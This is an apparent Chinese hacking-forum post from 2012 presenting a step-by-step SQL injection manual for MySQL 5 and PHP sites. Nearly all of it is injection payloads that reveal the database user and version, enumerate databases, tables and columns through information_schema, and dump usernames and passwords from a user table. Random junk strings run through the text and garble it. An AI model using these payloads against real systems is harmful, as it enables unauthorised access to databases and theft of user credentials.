找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2123|回复: 0
打印 上一主题 下一主题

mysql盲注手册

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:27:53 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

' \* V- D& g, o$ i; U/ j教程内容:Mysql 5+php 注入
* C; o0 `/ e- O* d" U6 [
+ O9 V& x3 t* f: Z; G) y) x# ^* E7 z; h( x
1 O! J$ p! }& F6 B
一.查看MYSQL基本信息(库名,版本,用户)
: t- j" D. ]! C$ \& z( Z; o; }7 L- W: {0 K
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*8 t- r4 G8 H+ G* ~* M

. ]* p- E1 ^- s' q二.查数据库$ J$ _# d9 M# @2 F

* \) m& R; a2 G( X8 i- ]1 ~9 R- ]and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8  from information_schema.SCHEMATA limit 1,1/*4 G  R6 c, p* f2 S
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。2 y9 ?+ q3 F% O* o( l
* N+ U" J/ g6 n0 w% k
三.暴表* e) t4 p& A4 R+ i

4 A$ `6 X7 A8 e! e; K) y, ~; }and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
  y2 g2 v) A1 C9 ~. ^: [9 J9 Q
# b# D3 \' ?. C7 ^limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。1 f6 x; b1 [% K* T
; {) P9 {8 T$ s
四.暴字段
- v# |; v7 v$ g, ^- n0 N/ w. E( E7 w2 Q6 L
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/** c+ B. J  H0 n5 _4 g# H8 s3 ~
2 `/ `5 Q# f/ b4 R" Y9 p
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
4 t; b& r5 q% F; J5 Z5 X( V2 L6 j$ S3 y4 ?& L5 `+ k3 B  G+ ^- K
五.暴数据
6 n; A1 V( i% e4 x' I- Y
6 g. F  e0 C& q* i1 ?  m6 mand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*) P. y% O) ]& o, [; m* _1 N

7 o; Q- `' C7 M, q. E- m
3 y* W5 m0 s! _& ]这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
5 |5 x5 b: i0 h/ T5 ~8 x- h
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表